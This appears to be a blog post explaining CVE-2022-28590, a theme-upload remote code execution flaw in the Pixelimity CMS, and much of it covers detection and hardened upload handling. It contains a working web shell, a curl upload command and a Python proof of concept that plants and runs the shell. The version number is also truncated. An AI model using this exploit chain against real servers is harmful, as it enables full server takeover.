A critical security vulnerability, identified as CVE-2022-28590, affects the Pixelimity 1. CMS. This is a classic Remote Code Execution (RCE) issue that lurks in its theme installation feature. If you run a Pixelimity-based website, you could be at risk—even if you think it’s a small and hidden site.

This deep-dive post explains the vulnerability, walks through step-by-step exploitation, shows sample malicious payloads, and offers mitigation pointers. Whether you’re a developer, sysadmin, or just a curious techie, you’ll learn why even “minor” PHP platforms matter to hackers.

Pixelimity allows admins to install new themes through an AJAX action:

/admin/admin-ajax.php?action=install_theme

However, input validation was either missing or flawed in v1.. Attackers could upload zipped “themes” containing PHP files, which the system would then unzip and drop straight into executable directories. If an attacker uploads a fake theme with web shell code, they can remotely control the whole server.

- Lets attackers upload arbitrary files, not just safe themes
- Web shell can offer root/system-level code execution

1. The Upload Mechanism

Pixelimity’s AJAX endpoint lets users POST a zip file. Here’s a simplified representation of a vulnerable handler:

// admin/admin-ajax.php (simplified; no authentication or CSRF check precedes this block)
if ($_GET['action'] == 'install_theme') {
    $file = $_FILES['theme_zip'];
    // Illustrative: the target directory name is taken from the upload, unvalidated
    $theme_dir = basename($file['name'], '.zip');
    $zip = new ZipArchive;
    if ($zip->open($file['tmp_name']) === TRUE) {
        // Every entry in the archive is written into the web-served themes tree,
        // whatever its name or extension, so a bundled .php file becomes executable
        $zip->extractTo('../themes/' . $theme_dir);
        $zip->close();
        echo "Theme installed!";
    } else {
        echo "Failed!";
    }
}

shell.php (packed inside theme.zip):

<?php system($_GET['cmd']); ?>

With curl or Burp Suite, the attacker sends:

curl -X POST \
  -F "theme_zip=@theme.zip" \
  "http://victim-site.com/admin/admin-ajax.php?action=install_theme"

Once uploaded, the attacker can run commands by browsing to:

http://victim-site.com/themes/theme_dir/shell.php?cmd=whoami

Replace whoami with any Linux/Windows command.

Here’s a mini-PoC in Python for uploading your shell:

import requests

url = 'http://target-site.com/admin/admin-ajax.php?action=install_theme'
# Send the zip as the 'theme_zip' multipart field the handler expects
with open('theme.zip', 'rb') as fh:
    files = {'theme_zip': ('theme.zip', fh)}
    res = requests.post(url, files=files)
print('[+] Upload:', res.text)

# Access the shell:
shell_url = 'http://target-site.com/themes/badtheme/shell.php?cmd=id'
r = requests.get(shell_url)
print('[+] Shell Output:', r.text)

References

- CVE Report for CVE-2022-28590
- Original Pixelimity code (GitHub)
- Exploit Details (ExploitDB)
- OWASP File Upload Vulnerabilities

How to Fix & Protect Yourself

- Patch: Update to the latest Pixelimity version or apply any available hotfixes from the developer.
- Authentication: Require admin login before allowing theme installation.
- Monitor: Scan your webroot for unexpected .php files in /themes/.
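For the "Monitor" step, here is a small command-line scanner that walks a themes directory and reports files that should never be there: anything with a PHP-executable extension in any position of its name (so `logo.php.png` is caught too), and any file whose first 64 KB contains a PHP open tag or a request superglobal. This is an added example written for this post, not Pixelimity's own code; it assumes PHP 8 and a themes directory passed on the command line (with `--demo` it builds a constructed sample tree in the temp directory instead).

```php
<?php
// Added example (not Pixelimity's code): scan a themes tree for planted PHP files.
// Usage: php scan_themes.php /var/www/site/themes      (or: php scan_themes.php --demo)
declare(strict_types=1);

// Extensions a typical Apache/PHP setup may execute or that alter server config.
const EXEC_EXT = ['php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml',
                  'phar', 'phps', 'pht', 'inc', 'htaccess', 'cgi', 'pl', 'sh'];
// Markers that do not belong in CSS/JS/image assets but are common in web shells.
const SHELL_MARKERS = ['<?php', '<?=', '$_GET', '$_POST', '$_REQUEST', '$_SERVER'];

/** Return [path => reason] for every suspicious file under $dir. */
function scan_themes(string $dir): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $path  = $file->getPathname();
        $parts = explode('.', $file->getFilename());
        // Check every extension after the first dot, not just the last one.
        foreach (array_slice($parts, 1) as $ext) {
            if (in_array(strtolower($ext), EXEC_EXT, true)) {
                $findings[$path] = "executable extension .$ext";
                continue 2;
            }
        }
        // Content check: a shell renamed to .png is still a shell if the server
        // can be coaxed into executing it, so look at the first 64 KB.
        $head = (string) file_get_contents($path, false, null, 0, 64 * 1024);
        foreach (SHELL_MARKERS as $marker) {
            if (str_contains($head, $marker)) {
                $findings[$path] = "contains '$marker'";
                break;
            }
        }
    }
    ksort($findings);
    return $findings;
}

/** Constructed sample tree: one legitimate asset, one planted shell, one double extension. */
function build_demo_tree(): string
{
    $root = sys_get_temp_dir() . '/themes_demo_' . bin2hex(random_bytes(4));
    mkdir("$root/goodtheme", 0700, true);
    mkdir("$root/badtheme", 0700, true);
    file_put_contents("$root/goodtheme/style.css", "body { color: #333; }\n");
    file_put_contents("$root/badtheme/shell.php", "<?php system(\$_GET['cmd']); ?>\n");
    file_put_contents("$root/badtheme/logo.php.png", "\x89PNG\r\n\x1a\n");
    return $root;
}

$target = $argv[1] ?? '--demo';
if ($target === '--demo') {
    $target = build_demo_tree();
    echo "Scanning constructed sample tree at $target\n";
}
$findings = scan_themes($target);
foreach ($findings as $path => $why) {
    echo "SUSPICIOUS  $path  ($why)\n";
}
// Non-zero exit so a cron job or CI step can alert on any finding.
exit($findings ? 1 : 0);
```

Run it from cron against the live themes directory and alert on a non-zero exit. The content check is deliberately narrow (PHP open tags and request superglobals) to keep false positives on legitimate JavaScript low; a stricter baseline is to hash the directory after a known-good install and flag any file whose hash changes.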

Example defensive code:

// Example: blocking PHP files in uploads, using the real ZipArchive API
for ($i = 0; $i < $zip->numFiles; $i++) {
    $name = $zip->getNameIndex($i);
    // Reject PHP-executable extensions anywhere in the name (also shell.php.png)
    // and any path traversal before a single entry is extracted
    if (preg_match('/\.(php\d?|phtml|phar|phps)(\.|$)/i', $name) || strpos($name, '..') !== false) {
        die("Blocked invalid file in theme!");
    }
}
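To make the fix concrete, here is a hardened replacement for the install_theme action that applies all three mitigations at once: an admin session plus CSRF token before anything else, validation of every archive entry (path traversal, executable extensions in any position, an allowlist of asset types, entry-count and size caps) before extraction, and a sanitised destination name. This is an added example written for this post, not Pixelimity's own code; the session key `is_admin`, the CSRF field `csrf`, the `theme_name` POST field, the directory layout and PHP 8 are assumptions.

```php
<?php
// Added example (not Pixelimity's code): hardened install_theme handler.
// Session key, CSRF field name, theme_name field and directory layout are assumptions.
declare(strict_types=1);

const THEMES_DIR    = __DIR__ . '/../themes';   // assumed layout
const MAX_ZIP_BYTES = 5 * 1024 * 1024;           // upload size cap
const MAX_ENTRIES   = 500;                       // guard against zip bombs
const ALLOWED_EXT   = ['css', 'js', 'html', 'htm', 'png', 'jpg', 'jpeg', 'gif',
                       'svg', 'webp', 'woff', 'woff2', 'ttf', 'json', 'txt', 'md'];
// Extensions a typical Apache/PHP setup may execute or that alter server config.
const EXEC_EXT      = ['php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml',
                       'phar', 'phps', 'pht', 'inc', 'htaccess', 'cgi', 'pl', 'sh'];

/** Stop the request unless an admin session and a valid CSRF token are present. */
function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $ok = !empty($_SESSION['is_admin'])                     // assumed session key
        && isset($_SESSION['csrf'], $_POST['csrf'])
        && hash_equals($_SESSION['csrf'], (string) $_POST['csrf']);
    if (!$ok) {
        http_response_code(403);
        exit('Forbidden');
    }
}

/** Return the problems found in the archive's entries; an empty list means safe to extract. */
function validate_zip_entries(ZipArchive $zip): array
{
    if ($zip->numFiles > MAX_ENTRIES) {
        return ["too many entries ({$zip->numFiles})"];
    }
    $errors = [];
    $total  = 0;
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name   = $zip->getNameIndex($i);
        $total += $zip->statIndex($i)['size'];
        // Absolute paths, backslashes and any '..' segment: '../x', '/etc/x', 'a/../../x'
        if ($name === '' || $name[0] === '/' || str_contains($name, '\\')
            || in_array('..', explode('/', $name), true)) {
            $errors[] = "unsafe path: $name";
            continue;
        }
        if (str_ends_with($name, '/')) {
            continue;                                       // directory entry
        }
        $parts = explode('.', basename($name));
        // Every extension after the first dot is checked, so shell.php.png is caught.
        foreach (array_slice($parts, 1) as $ext) {
            if (in_array(strtolower($ext), EXEC_EXT, true)) {
                $errors[] = "executable file: $name";
                continue 2;
            }
        }
        if (count($parts) < 2 || !in_array(strtolower(end($parts)), ALLOWED_EXT, true)) {
            $errors[] = "extension not allowed: $name";
        }
    }
    if ($total > 10 * MAX_ZIP_BYTES) {
        $errors[] = "uncompressed size too large ($total bytes)";
    }
    return $errors;
}

/** Install the uploaded archive as themes/<name>; throws on any validation failure. */
function install_theme(array $upload, string $name): string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,40}$/', $name)) {
        throw new RuntimeException('invalid theme name');
    }
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'])
        || $upload['size'] > MAX_ZIP_BYTES) {
        throw new RuntimeException('bad upload');
    }
    $zip = new ZipArchive();
    if ($zip->open($upload['tmp_name']) !== true) {
        throw new RuntimeException('not a zip archive');
    }
    $errors = validate_zip_entries($zip);
    if ($errors) {
        $zip->close();
        throw new RuntimeException('rejected: ' . implode('; ', $errors));
    }
    $dest = THEMES_DIR . '/' . $name;
    if (file_exists($dest) || !mkdir($dest, 0755, true) || !$zip->extractTo($dest)) {
        $zip->close();
        throw new RuntimeException('could not create or populate theme directory');
    }
    $zip->close();
    return $dest;
}

if (($_GET['action'] ?? '') === 'install_theme') {
    require_admin();
    try {
        install_theme($_FILES['theme_zip'] ?? [], (string) ($_POST['theme_name'] ?? ''));
        echo 'Theme installed!';
    } catch (RuntimeException $e) {
        http_response_code(400);
        error_log('install_theme rejected: ' . $e->getMessage());   // detail stays server-side
        echo 'Theme rejected.';
    }
}
```

Validation runs over the central directory before a single entry touches disk, so a rejected archive never leaves partial files in the themes tree. As defence in depth, also stop the web server from executing anything under /themes/ regardless of what lands there: with mod_php, `php_admin_flag engine off` inside a `<Directory>` block for that path; with nginx, a `location ~ ^/themes/.*\.php$ { return 404; }` block ahead of the PHP-FPM location.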

Conclusion

CVE-2022-28590 is a textbook example of the danger of trusting user uploads, especially in admin tools. RCE bugs like this are how sites get defaced, data gets stolen, or a little-used server becomes a launchpad for wider attacks.

If you use any “lightweight” CMS like Pixelimity, scan your code for insecure file upload and extraction. Patch today; don’t wait for the next scan.


Stay safe!
For questions or tech details, see the NVD CVE page or the Pixelimity repo.

Timeline

Published on: 05/03/2022 14:15:00 UTC
Last modified on: 05/09/2022 20:53:00 UTC